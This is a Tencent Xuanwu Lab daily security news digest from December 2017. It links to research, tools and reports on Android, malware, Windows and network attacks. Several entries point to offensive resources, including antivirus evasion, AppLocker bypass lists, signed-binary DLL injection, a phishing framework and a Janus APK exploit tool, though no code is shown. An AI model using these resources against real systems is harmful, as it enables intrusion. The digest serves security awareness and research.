
腾讯玄武实验室安全动态推送
Tencent Xuanwu Lab Security Daily News
-
[ Android ] 如何使用 Burp 代理调试安卓应用中的 HTTP(S) 流量: https://android.jlelse.eu/how-to-debug-http-s-traffic-for-android-apps-with-burp-proxy-73f906821283
-
[ Android ] 利用前两天爆出的 Android APK 签名验证漏洞 Janus 生成 APK 样本的工具: https://github.com/odensc/janus
-
[ Crypto ] intel 全内存加密技术(TME、MKTME)介绍: https://software.intel.com/sites/default/files/managed/a5/16/Multi-Key-Total-Memory-Encryption-Spec.pdf
-
[ Industry News ] Synaptics 宣称 HP 笔记本中存在 Keylogger 的报道是错误的,只是软件被误认为 Keylogger : https://threatpost.com/synaptics-says-claims-of-a-keylogger-in-hp-laptops-are-false/129175/
-
-
[ Malware ] 攻击者部署新的 ICS 工控攻击框架 "TRITON" 并导致重要基础设施运营中断: https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.htmlhttps://www.symantec.com/blogs/threat-intelligence/triton-malware-ics
-
[ MalwareAnalysis ] 趋势科技对 PRILEX 和 CUTLET MAKER ATM 恶意软件家族的分析: http://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/
-
[ Popular Software ] Microsoft Azure AD Connect 中存在权限缺陷: https://threatpost.com/permissions-flaw-found-azure-ad-connect/129170/
-
[ Popular Software ] 在 Git 中滥用 Escape Sequences 漏洞,Hiding content from Git: https://www.twistlock.com/2017/12/13/hiding-content-git-escape-sequence-twistlock-labs-experiment/
-
[ ReverseEngineering ] x86_64 逆向工程介绍: https://leotindall.com/tutorial/an-intro-to-x86_64-reverse-engineering/
-
[ SecurityReport ] Zimperium 发布第三季度全球移动威胁报告: https://blog.zimperium.com/zimperium-global-threat-report-q3-2017/
-
[ SecurityReport ] 从数据回顾 2017,Kaspersky 2017 安全公告: https://securelist.com/ksb-overall-statistics-2017/83453/
-
[ Tools ] 前段时间推送过 Duo Labs 开源的一个用于检查当前系统 EFI 固件版本是否正确的工具 - EFIgy,今天 TrailofBits 团队为操作系统检测和监控框架 osquery 写了一个扩展,用于集成 EFIgy 的功能: https://blog.trailofbits.com/2017/12/14/announcing-the-trail-of-bits-osquery-extension-repository/
-
[ Tools ] 如何使用 OWASP-ZSC 绕过杀毒软件检测 Part 1: https://www.hackers-arise.com/single-post/2017/05/03/How-to-Evade-AV-with-OWASP-ZSC-Part-1
-
[ Tools ] 支持 record 和 replay(运行一次,多次回放调试)的调试器 rr 已经更新到 5.1.0 版本: http://robert.ocallahan.org/2017/12/rr-510-released.html http://rr-project.org/
-
[ Tools ] SPF - 一款社会工程学钓鱼框架: https://github.com/tatanus/SPF
-
[ Windows ] 利用微软签名的 MavInject32.exe 可以向任意进程注入 DLL: https://twitter.com/gn3mes1s/status/941315826107510784
-
[ Windows ] Bypass AppLocker 的 30 种方法: https://github.com/api0cradle/UltimateAppLockerByPassList
-
[ Android ] VMP加固技术对比第三代加固技术,安全效果究竟如何?: http://webcache.googleusercontent.com/search?q=cache:KxbcyaSfoRcJ:www.freebuf.com/column/157104.html+&cd=1&hl=zh-CN&ct=clnk&gl=cn
-
-
-
-
[ Industry News ] 12 月 13 日的凌晨 04:43(UTC),BGPmon 监控到 Global BGP 路由表中将多个主流网站的流量引向了俄罗斯的一家 ISP 运营商,一共持续了 6 分钟,研究员称这可能是某种攻击的前兆: https://blog.vectra.ai/blog/bgp-hijackers-this-traffic-is-going-to-russia
-
-
[ Tools ] ELK 日志分析平台如何利用 Sysmon 扩展监控范围并检测实际 APT34 样本的: http://www.ubersec.com/2017/12/14/sysmon-elk-monitoring-integration-and-apt34-tools/
-
-
[ Tools ] virtual-kubelet - 开源的 Kubernetes kubelet 实现: https://github.com/virtual-kubelet/virtual-kubelet
-